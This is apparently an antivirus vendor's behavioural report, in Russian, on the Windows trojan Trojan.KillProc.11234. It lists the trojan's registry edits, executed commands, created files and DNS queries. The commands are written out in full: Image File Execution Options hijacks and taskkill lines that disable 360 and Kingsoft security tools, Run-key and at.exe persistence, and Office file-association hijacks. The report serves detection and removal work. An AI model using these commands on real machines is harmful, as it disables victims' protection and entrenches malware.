Trojan.KillProc.11234

Техническая информация

Для обеспечения автозапуска и распространения:

Модифицирует следующие ключи реестра:

[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kismain.exe] 'debugger' = '"%PROGRAM_FILES%\360\safetray\360safetray.exe"'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kpopserver.exe] 'debugger' = '"%PROGRAM_FILES%\360\safetray\360safetray.exe"'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KSafe.exe] 'debugger' = '"%PROGRAM_FILES%\360\safetray\360safetray.exe"'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360sd.exe] 'debugger' = '"%PROGRAM_FILES%\360\safetray\ksafetray.exe"'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQdoctorRtp.exe] 'debugger' = '"%PROGRAM_FILES%\360\safetray\ksafetray.exe"'
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce] 'alg' = '"%WINDIR%\Config\shell\alg.exe"'
[<HKLM>\SOFTWARE\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}] 'ClsidExtension' = '╨┬╬┼╫╩╤╢'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'kxetray' = '"%WINDIR%\repair\kxetray.exe"'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kxescore.exe] 'debugger' = '"%PROGRAM_FILES%\360\safetray\360safetray.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce] 'safetraytray' = '"%WINDIR%\SYSTEM\360shell.exe"'
[<HKLM>\SOFTWARE\Classes\Word.Template.8\shell\Open\command] '' = '"<Текущая директория>\WinWord.exe" "%1"'
[<HKLM>\SOFTWARE\Classes\Applications\Excel.exe\shell\open\command] '' = '<Текущая директория>\Excel.exe "%1"'
[<HKLM>\SOFTWARE\Classes\Word.Document.8\shell\Open\command] '' = '"<Текущая директория>\WinWord.exe" "%1"'
[<HKLM>\SOFTWARE\Classes\Applications\WINWORD.EXE\shell\open\command] '' = '<Текущая директория>\WinWord.exe "%1"'
[<HKLM>\SOFTWARE\Classes\Word.RTF.8\shell\Open\command] '' = '"<Текущая директория>\WinWord.exe" "%1"'
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'GrpConv' = 'grpconv -o'
[<HKLM>\SOFTWARE\Classes\MSProgramGroup\Shell\Open\Command] '' = '<SYSTEM32>\grpconv.exe %1'
[<HKLM>\SOFTWARE\Classes\PowerPoint.Show.8\shell\Open\command] '' = '"<Текущая директория>\PowerPnt.exe" "%1"'
[<HKLM>\SOFTWARE\Classes\Excel.Chart.8\shell\Open\command] '' = '"<Текущая директория>\Excel.exe" "%1"'
[<HKLM>\SOFTWARE\Classes\Applications\PowerPnt.exe\shell\open\command] '' = '<Текущая директория>\PowerPnt.exe "%1"'

Вредоносные функции:

Запускает на исполнение:

<SYSTEM32>\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce /v safetraytray /d """"%WINDIR%\SYSTEM\360shell.exe"""" /f
<SYSTEM32>\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /va /f
<SYSTEM32>\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /v kxetray /d """"%WINDIR%\repair\kxetray.exe"""" /f
<SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\╬╥╥к╦╤╦ў" /v "" /d "http://www.bi#o.cn/js/menu.asp?me#########" /f
<SYSTEM32>\reg.exe add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce /v alg /d """"%WINDIR%\Config\shell\alg.exe"""" /f
<SYSTEM32>\ping.exe -n 1 b-cn.8800.org
<SYSTEM32>\ping.exe -n 1 g-cn.8800.org
<SYSTEM32>\findstr.exe /m /c:"111.111.111.2 www.ba##u.com" "<DRIVERS>\etc\hosts"
<SYSTEM32>\at.exe 12:22 /every:F %WINDIR%\Config\shell\alg.exe
<SYSTEM32>\at.exe /delete /yes
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "default Icon" /d "<SYSTEM32>\shell32.dll,14" /f
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "<SYSTEM32>\shell32.dll,14" /f
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "<SYSTEM32>\shell32.dll,14" /f
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "╨┬╬┼╫╩╤╢" /f
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
<SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\╫╩╤╢╨┬╬┼" /v "" /d "http://www.bi#o.cn/js/menu.asp?me#######" /f
<SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\═°╒╛╡╝║╜" /v "" /d "http://www.bi#o.cn/js/menu.asp?me######" /f
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "╨┬╬┼╫╩╤╢" /f
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQdoctorRtp.exe" /v debugger /d """"%PROGRAM_FILES%\360\safetray\ksafetray.exe"""" /f
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360sd.exe" /v debugger /d """"%PROGRAM_FILES%\360\safetray\ksafetray.exe"""" /f
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KSafe.exe" /v debugger /d """"%PROGRAM_FILES%\360\safetray\360safetray.exe"""" /f
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kpopserver.exe" /v debugger /d """"%PROGRAM_FILES%\360\safetray\360safetray.exe"""" /f
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kismain.exe" /v debugger /d """"%PROGRAM_FILES%\360\safetray\360safetray.exe"""" /f
<SYSTEM32>\rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 <Текущая директория>\cnfg.inf
<SYSTEM32>\cmd.exe /c """%TEMP%\office2003.bat"""
<SYSTEM32>\runonce.exe -r
<SYSTEM32>\cmd.exe /c """%TEMP%\win32.bat"""
<SYSTEM32>\grpconv.exe -o
<SYSTEM32>\taskkill.exe /f /im kxesapp.exe
<SYSTEM32>\taskkill.exe /f /im kxescore.exe
<SYSTEM32>\taskkill.exe /f /im kismain.exe
<SYSTEM32>\taskkill.exe /f /im QQdoctorRtp.exe
<SYSTEM32>\taskkill.exe /f /im kpopserver.exe
<SYSTEM32>\taskkill.exe /f /im 360sd.exe
<SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kxescore.exe" /v debugger /d """"%PROGRAM_FILES%\360\safetray\360safetray.exe"""" /f
<SYSTEM32>\taskkill.exe /f /im 360tray.exe
<SYSTEM32>\taskkill.exe /f /im ksafetray.exe
<SYSTEM32>\taskkill.exe /f /im kxetray.exe

Изменения в файловой системе:

Создает следующие файлы:

%WINDIR%\repair\kxetray.exe
<SYSTEM32>\winsd.inf
%TEMP%\a.txt
<SYSTEM32>\1025\notepad.exe
<SYSTEM32>\kxetray.exe
%WINDIR%\system\360shell.exe
%WINDIR%\Config\shell\alg.exe
%TEMP%\office2003.bat
%TEMP%\win32.exe
%TEMP%\cnfg1.inf
<Текущая директория>\cnfg.inf
%TEMP%\exe2.tmp
%TEMP%\win32.bat
%TEMP%\exe1.tmp

Удаляет следующие файлы:

%TEMP%\win32.exe
%TEMP%\a.txt
<Текущая директория>\cnfg.inf
%TEMP%\cnfg1.inf

Сетевая активность:

UDP:

DNS ASK b-##.8800.org
DNS ASK g-##.8800.org

Другое:

Ищет следующие окна:

ClassName: '' WindowName: ''

Технологии

Термины

Обучение и просвещение

Мифы

Техническая информация

Рекомендации по лечению

Демо бесплатно на 14 дней